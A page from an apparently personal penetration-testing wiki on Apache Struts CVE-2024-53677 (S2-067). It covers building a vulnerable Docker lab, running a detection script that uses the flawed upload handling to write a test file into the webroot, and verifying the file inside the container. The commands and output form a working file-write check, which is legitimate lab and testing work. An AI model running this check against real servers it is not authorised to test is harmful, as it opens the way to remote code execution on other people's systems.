0xPThree.gitbook.io
  • Network Services
    • Ports
      • 21 - FTP
      • 22 - SSH
      • 23 - Telnet
      • 25, 465, 587 - SMTP(S)
      • 53 - DNS
      • 80, 443 - HTTP(S)
        • Frameworks
          • Drupal
          • Flask
          • Laravel
          • Tomcat
          • Werkzeug
        • Fuzzing
        • Grafana
        • Languages
          • PHP
        • WebDAV
        • Web Vulnerabilities
          • CloudFlare Bypass
          • Command Injection
          • CSTI
          • File Inclusion/Path Traversal
          • SQL Injection
          • SSI
          • SSTI
          • Upload bypass
          • XLST
          • XML Injection
      • 88 - Kerberos
      • 135, 593 - MSRPC
      • 139, 445 - SMB
      • 161, 162, 10161, 10162 - SNMP
      • 1433, 3306 - SQL
      • 2049 - NFS
      • 2375 - Docker
  • Active Directory
    • ADCS
    • DACL Abuse
      • AddMember
      • ForceChangePassword
      • Kerberoasting
      • ReadLAPSPassword
      • ReadGMSAPassword
      • Grant Ownership
      • Grant Rights
      • Logon Script
      • Rights on RODC object
    • Security groups
    • Misc
  • Coding Languages
    • Python
  • Exploits / PoC's
    • Ansible
      • Ansible AWX
    • Apache
      • HTTP Server - CVE-2021-41773
      • Struts - CVE-2024-53677 / S2-067
      • Tomcat - CVE-2020-1938 / CVE-2020-10487
      • Tomcat - CVE-2025-24813
    • Confluence - CVE-2023-22527
    • CUPS - CVE-2024-47***
    • D-Link
      • CVE-2020-29322
      • Decrypt firmware: DIR-X1560
    • Dmidecode - CVE-2023-30630
    • Erlang
      • OTP SSH - CVE-2025-32433
    • EternalBlue - MS17-010
    • Gitlab - CVE-2023-7028
    • Ivanti - CVE-2024-21893 / 21887
    • Jenkins - CVE-2024-23897
    • LXD group - N/A
    • nf_tables - CVE-2024-1086
    • NFS - N/A
    • Oracle
      • WebLogic - CVE-2018-2628
      • WebLogic - CVE-2019-2729
      • WebLogic - CVE-2023-21839
      • WebLogic - CVE-2024-20931
      • WebLogic - CVE-2024-21006
    • PHP
      • CVE-2024-4577
    • RunC
      • CVE-2022-0811
      • CVE-2024-21626
    • Snap - CVE-2019-7304
    • TP-Link - CVE-2024-5035
  • Hardware
    • Firmware
    • JTAG
    • SPI
    • UART
    • USB
  • Post Exploit
    • Compile payload
    • Obfuscation
    • Read VMDK files
    • Saved Credentials
      • Linux - Ansible AWX / Tower
      • Linux - Dell Networker
      • Windows - Mozilla Firefox
      • Windows - Notepad++
      • Windows - WinSCP
    • Session Hijack
    • Sniffing Passwords
    • Upgrade shell
    • VMware
      • Disk Encryption
      • LDAP Connection (SSO)
      • Restore VCSA Postgres Database
      • vCenter Forge SAML
      • Waiter Account Information
  • Development
    • Dnsmasq DHCP
    • Docker
      • Ansible AWX
      • Docker Compose
      • FirmAE - Emulate Firmware
      • Oracle WebLogic
      • Rocket.Chat
      • Tomcat
      • Vaultwarden
    • Harden Windows Host
    • HTTPS Proxy
    • Netplan + Networkd
    • SSL/TLS Certificates
  • TODO
Powered by GitBook
On this page
  • Proof-of-Concept
  • Setup test environment
  • Exploit

Was this helpful?

  1. Exploits / PoC's
  2. Apache

Struts - CVE-2024-53677 / S2-067

Last updated 4 months ago

Was this helpful?

File upload logic in Apache Struts is flawed. An attacker can manipulate file upload params to enable paths traversal and under some circumstances this can lead to uploading a malicious file which can be used to perform Remote Code Execution.

Vulnerable versions:

  • Struts 2.0.0 - Struts 2.3.37 (End-of-Life),

  • Struts 2.5.0 - Struts 2.5.33, and

  • Struts 6.0.0 - Struts 6.3.0.2

References:


Proof-of-Concept

Setup test environment

» git clone git@github.com:0xPThree/struts_cve-2024-53677.git
» cd struts_cve-2024-53677
» sudo docker build --ulimit nofile=122880:122880 -m 3G -t struts-6.3.0.1 .
» sudo docker run -p 8081:8080 --ulimit nofile=122880:122880 -m 3G --rm -it --name struts-6.3.0.1 struts-6.3.0.1
» curl http://127.0.0.1:8081/upload.action

<html>
  <head>
    <title>File upload</title>
  </head>
  <body>
    <h1>Apache Struts 6.3.0.1</h1>
    <p>Welcome to Apache Struts 6.3.0.1 lab. This application is vulnerable to CVE-2023-50164 and CVE-2024-53677.</p>
    <form id="upload" name="upload" action="/upload.action;jsessionid=196954CE343A603EC7EE26FFF611D302" method="post" enctype="multipart/form-data">
      <table class="wwFormTable">
        <tr>
          <td class="tdLabel"></td>
          <td 
            class="tdInput"            
            ><input type="file" name="upload" id="upload_upload"/></td>
        </tr>
        <tr>
          <td colspan="2">
            <div class="formButton"><input type="submit" value="Submit" id="upload_0"/></div>
          </td>
        </tr>
      </table>
    </form>
  </body>
</html>

Exploit

» curl http://127.0.0.1:8081/vuln_test.txt                                  
<!doctype html><html lang="en"><head><title>HTTP Status 404 – Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 – Not Found</h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Message</b> The requested resource [&#47;vuln_test.txt] is not available</p><p><b>Description</b> The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.</p><hr class="line" /><h3>Apache Tomcat/9.0.98</h3></body></html>

» python3 check.py -u http://127.0.0.1:8081 --upload_endpoint /upload.action
2025-01-07 12:21:20,822 [INFO] Starting detection process...
2025-01-07 12:21:20,822 [INFO] Starting detection for CVE-2024-53677 (S2-067)...
2025-01-07 12:21:20,823 [INFO] Sending test request to upload endpoint: http://127.0.0.1:8081/upload.action
2025-01-07 12:21:20,838 [INFO] [INFO] File upload request succeeded.
2025-01-07 12:21:20,838 [WARNING] [ALERT] File name overwrite detected. Target may be vulnerable!
2025-01-07 12:21:20,838 [INFO] Detection process completed.

» curl http://127.0.0.1:8081/vuln_test.txt                                  
CVE-2024-53677 / S2-067 detection test.

» sudo docker exec -it struts-6.3.0.1 bash
root@b991eecb47b4:/usr/local/tomcat# cd webapps/ROOT
root@b991eecb47b4:/usr/local/tomcat/webapps/ROOT# ls -al
total 28
drwxr-x--- 5 root root 4096 Jan  7 11:23 .
drwxr-xr-x 1 root root 4096 Jan  7 11:18 ..
drwxr-x--- 2 root root 4096 Jan  7 11:14 forbidden
-rw-r----- 1 root root  226 Jan  7 09:41 index.html
drwxr-x--- 3 root root 4096 Jan  7 11:14 META-INF
-rw-r----- 1 root root   39 Jan  7 11:23 vuln_test.txt
drwxr-x--- 4 root root 4096 Jan  7 11:14 WEB-INF
root@b991eecb47b4:/usr/local/tomcat/webapps/ROOT# cat vuln_test.txt 
CVE-2024-53677 / S2-067 detection test.

Check script from:

https://nvd.nist.gov/vuln/detail/CVE-2024-53677
https://cwiki.apache.org/confluence/display/WW/S2-067
https://xz.aliyun.com/t/13172?time__1311=GqmhkGOG8GkD%2FD0lD2nbDkYoiteSKcepD
https://github.com/TAM-K592/CVE-2024-53677-S2-067/tree/ALOK